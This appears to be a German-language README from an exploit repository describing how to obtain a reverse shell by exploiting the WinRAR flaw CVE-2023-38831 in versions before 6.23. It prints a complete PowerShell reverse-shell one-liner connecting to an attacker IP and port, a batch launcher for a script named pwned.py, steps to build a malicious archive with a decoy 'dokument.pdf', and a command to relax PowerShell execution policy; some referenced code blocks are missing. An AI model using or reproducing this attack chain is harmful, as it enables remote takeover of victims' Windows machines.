
Erforderliche Schritte, um eine Reverse Shell durch Ausnutzen der WinRAR-Schwachstelle CVE-2023-38831 in Versionen vor 6.23 zu erhalten.
In diesem Repository nutzen wir die WinRAR-Schwachstelle CVE-2023-38831 aus, um eine Reverse-Shell vom Windows-Zielrechner auf den Kali-Linux-Angreiferrechner zu erhalten.
Laden Sie den Inhalt dieses Repositorys herunter:

Als Nächstes müssen wir die erforderlichen Python-Abhängigkeiten installieren, um diese Schwachstelle mit den folgenden Befehlen ausnutzen zu können:
pip install rarce

Wir werden einen bösartigen Code ausführen, der uns eine Reverse-Shell liefert, stammend von der Website revshells.com (unter Angabe der entsprechenden IP und des Ports des Angreifers):

$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
Diesen PowerShell-Code speichern wir in einer .ps1-Datei (wird später ausgeführt):

Sobald wir den Code in ps1 zur Erlangung der Reverse-Shell haben, erstellen wir eine Python-Datei, die mithilfe der os-Bibliothek die .ps1-Datei ausführt:

Danach erstellen wir eine .bat-Datei mit folgendem Code:

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe
rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py
rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%
rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause
An diesem Punkt müssen wir die bösartige WinRAR-Datei erstellen:

Wir führen die Datei dokument.pdf innerhalb der .rar-Datei aus:


Schließlich, wenn wir auf dem Angreiferrechner mit netcat im Lauschmodus bleiben, haben wir die Reverse-Shell empfangen:

Falls PowerShell-Befehle nicht ausgeführt werden können, ist es notwendig, die Ausführung von Skripten auf unserem System zu aktivieren:


Wir aktivieren es:

Und führen den folgenden Befehl aus:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser